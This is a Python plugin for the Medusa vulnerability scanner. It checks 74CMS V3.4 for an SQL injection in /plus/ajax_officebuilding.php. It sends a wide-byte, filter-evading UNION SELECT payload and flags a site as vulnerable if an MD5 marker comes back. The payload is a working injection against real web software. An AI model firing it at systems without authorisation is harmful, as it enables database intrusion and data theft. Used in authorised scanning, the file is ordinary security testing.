#!/usr/bin/env python
# -*- coding: utf-8 -*-

__author__ = 'Ascotbe'
__date__ = '2019/10/11 16:39 PM'
import requests
from ClassCongregation import VulnerabilityDetails,WriteFile,ErrorLog,ErrorHandling

class VulnerabilityInfo(object):
    def __init__(self,Medusa):
        self.info = {}
        self.info['number']="0" #如果没有CVE或者CNVD编号就填0，CVE编号优先级大于CNVD
        self.info['author'] = "Ascotbe"  # 插件作者
        self.info['create_date'] = "2020-1-6"  # 插件编辑时间
        self.info['disclosure']='2014-09-03'#漏洞披露时间，如果不知道就写编写插件的时间
        self.info['algroup'] = "74CMSSQLInjectionVulnerabilityExists"  # 插件名称
        self.info['name'] ='74CMS存在SQL注入漏洞' #漏洞名称
        self.info['affects'] = "74CMS"  # 漏洞组件
        self.info['desc_content'] = "骑士CMS/plus/ajax_officebuilding.php文件存在SQL注入漏洞"  # 漏洞描述
        self.info['rank'] = "高危"  # 漏洞等级
        self.info['suggest'] = "升级最新的系统"  # 修复建议
        self.info['version'] = "V3.4.20140530"  # 这边填漏洞影响的版本
        self.info['details'] = Medusa  # 结果

def medusa(**kwargs)->None:
    url = kwargs.get("Url")
    Headers=kwargs.get("Headers")
    proxies = kwargs.get("Proxies")

    try:
        payload = "/plus/ajax_officebuilding.php?act=key&key=asd%錦%27%20uniounionn%20selselectect%201,2,3,md5(7836457),5,6,7,8,9%23"
        payload_url = url + payload

        Headers['Content-Type']= 'application/x-www-form-urlencoded'
        Headers['Accept']='text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'

        resp = requests.get(payload_url, headers=Headers, timeout=6,  proxies=proxies,verify=False)
        con = resp.text
        code = resp.status_code
        if con.find('3438d5e3ead84b2effc5ec33ed1239f5') != -1:
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, resp,**kwargs).Write()  # 传入url和扫描到的数据
            WriteFile().result(str(url),str(Medusa))#写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
